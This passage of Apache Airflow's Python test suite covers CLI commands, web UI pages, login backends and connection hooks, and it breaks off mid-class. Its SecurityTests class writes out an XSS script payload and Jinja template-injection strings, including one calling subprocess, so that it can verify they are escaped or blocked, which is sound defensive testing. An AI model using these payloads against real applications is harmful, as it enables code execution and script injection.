cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except:
# exception is expected here since dag doesnt exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run,
# and the text of the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
try:
from airflow.hooks.http_hook import HttpHook
except ImportError:
HttpHook = None
@unittest.skipIf(HttpHook is None,
"Skipping test because HttpHook is not installed")
class HttpHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
